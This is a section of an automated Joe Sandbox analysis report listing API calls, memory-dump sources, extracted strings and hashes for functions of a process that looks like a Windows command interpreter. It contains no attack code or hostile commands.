                                                                                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EFA3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                  • String ID: \\.\
                                                                                                  • API String ID: 799470305-2900601889
                                                                                                  • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                  • Instruction ID: 271730f4e5713124116fa76b5f97b8c63fd2872904a0f578f10e2dba372c912e
                                                                                                  • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                  • Instruction Fuzzy Hash: 5251FC36A087C2A5EB60AF11E4102B9B7A0FB85B46FA54579D90D07F94DFBCD449C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1944892715-0
                                                                                                  • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                  • Instruction ID: 0890e85a024417700d4e41c860527261d59ea223de77a8e9f8574da65965236c
                                                                                                  • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                  • Instruction Fuzzy Hash: 95B1DF61A09742D6EA60BF11E464179E6A1FF44B82FE48479CA4E07BD0DEBCF885C730
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
                                                                                                    • Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
                                                                                                    • Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
                                                                                                    • Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
                                                                                                    • Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
                                                                                                    • Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823D54DE
                                                                                                  • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D552B
                                                                                                  • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823D554F
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823F345F
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F347E
                                                                                                  • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34C3
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823F34DB
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7823D1F7D), ref: 00007FF7823F34FA
                                                                                                    • Part of subcall function 00007FF7823E36EC: _get_osfhandle.MSVCRT ref: 00007FF7823E3715
                                                                                                    • Part of subcall function 00007FF7823E36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E3770
                                                                                                    • Part of subcall function 00007FF7823E36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3791
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1356649289-0
                                                                                                  • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                  • Instruction ID: a902d927f4699f31ae794a6369806cf6ad297b353383e8622069905770ddfa83
                                                                                                  • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                  • Instruction Fuzzy Hash: D991A532A0864297EB54AF11E414179FBE1FB88B82FA44179DA4E47B91DF7CE484CB20
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                  • String ID: %s$/-.$:
                                                                                                  • API String ID: 1644023181-879152773
                                                                                                  • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                  • Instruction ID: 55f64a30a7f0fa088b8cf0ff2a5a025a13436822ebc8f6f87fc42c90d90ecf1c
                                                                                                  • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                  • Instruction Fuzzy Hash: B691B662B0874291EF54AB11E4606BDE7A0FF44B86FE44079D94E43AD4DFBCD945C720
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823F7251), ref: 00007FF7823F628E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ObjectSingleWait
                                                                                                  • String ID: wil
                                                                                                  • API String ID: 24740636-1589926490
                                                                                                  • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                  • Instruction ID: fc056034f913fcfc78a963601c72a5275e210f0c6173b07b6544f1cc600ac2d4
                                                                                                  • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                  • Instruction Fuzzy Hash: BE416421A0854283FB606B11F410279AAA1FF85782FF4A175D92D46EA4CFBDE944CB21
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                  • String ID: $Application$System
                                                                                                  • API String ID: 3377411628-1881496484
                                                                                                  • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                  • Instruction ID: 190a20b37dc52e836db3eca7106f7b87bf2fb8a659a0017294e05663cd045eb5
                                                                                                  • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                  • Instruction Fuzzy Hash: 4841A932B04B029AE750AB60E4103EDBBB0FB88749F944139DE0E03B58EF78D545C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                  • String ID: :$\
                                                                                                  • API String ID: 3961617410-1166558509
                                                                                                  • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                  • Instruction ID: 74208f4952e02f82228475dbd3fe48514ed388dd721f5e7410134a64981e2748
                                                                                                  • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                  • Instruction Fuzzy Hash: EE21F921E0C642C7E7606B61A45407DFEA2FF49B56BE48579D94F43B90DFBCD848C620
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1397130798-0
                                                                                                  • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                  • Instruction ID: 57d471c4f2ba5fccf90c25469c23cc173e073fa849c76fc0a51b0cec0486638e
                                                                                                  • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                  • Instruction Fuzzy Hash: 6491C626B0878196EB64AB11D8602B9F7A1FF84B86FE48079D94D03F94DF7CD945C320
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823E25CA
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823E25E8
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823E260F
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823E2636
                                                                                                  • _wcsicmp.MSVCRT ref: 00007FF7823E2650
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                  • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                  • API String ID: 3407644289-1668778490
                                                                                                  • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                  • Instruction ID: 7eb77516207518b12177e08c7266728d34822702b22f5b87aead7c80e9ba8641
                                                                                                  • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                  • Instruction Fuzzy Hash: 4E317F65A0850295FB507F21E825279EAA4BF84B42FF4807AD90E57ED5CEFCE848C731
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                  • String ID: &()[]{}^=;!%'+,`~
                                                                                                  • API String ID: 2516562204-381716982
                                                                                                  • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                  • Instruction ID: 1bb1dea77367a6f9ddf20a61b3a2d09d60c539f1004a54ed8011d76f9f46ac1f
                                                                                                  • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                  • Instruction Fuzzy Hash: A0C1F432A1475186E750AF21E85067DB7E0FB44B95FA41139EE8E13B95DFBCE890C720
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
                                                                                                    • Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
                                                                                                    • Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C
                                                                                                  • iswspace.MSVCRT ref: 00007FF7823E7EEE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                  • String ID: A
                                                                                                  • API String ID: 3731854180-3554254475
                                                                                                  • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                  • Instruction ID: cf95fabd317e888f254d17b32ad112577b8b875cbff64ecdcfb321fcdf90f17f
                                                                                                  • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                  • Instruction Fuzzy Hash: FEA1A025A0968295EB60BB11E460279F7E0FF45792FB08078CA4D47B98DFBCE845CB31
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                  • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                  • API String ID: 1580871199-2613899276
                                                                                                  • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                  • Instruction ID: 224d1ac0d4012eea79a6ecfb479d1b986fac0732fd3a3667147746ecfa9d14f7
                                                                                                  • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                  • Instruction Fuzzy Hash: 3051C472B18B8286EB50AB16F810279B7E4FB88B86FA45135DE8E03B54DF7CD441C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                  • String ID: con
                                                                                                  • API String ID: 689241570-4257191772
                                                                                                  • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                  • Instruction ID: a68fd098ef20baad27440bf176e1c5d07678abea5647b6b944b6dafcb1733a5c
                                                                                                  • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                  • Instruction Fuzzy Hash: AD41C432A0864586E350AF15A45437DFEA1F789BA6FA48338DA2D437D0CFBDD849C760
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                  • String ID: PE
                                                                                                  • API String ID: 2941894976-4258593460
                                                                                                  • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                  • Instruction ID: 42dfcbc13fef742ad03bb645c2002cbfce90960a01de3be3884c722fa9ac1c7a
                                                                                                  • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                  • Instruction Fuzzy Hash: 7D41467260865186EA60AB11F420679FBA0FB89B92F948174DE5D03F95DFBCE845CB20
                                                                                                  APIs
                                                                                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7823F849D,?,?,?,00007FF7823FF0C7), ref: 00007FF7823E0045
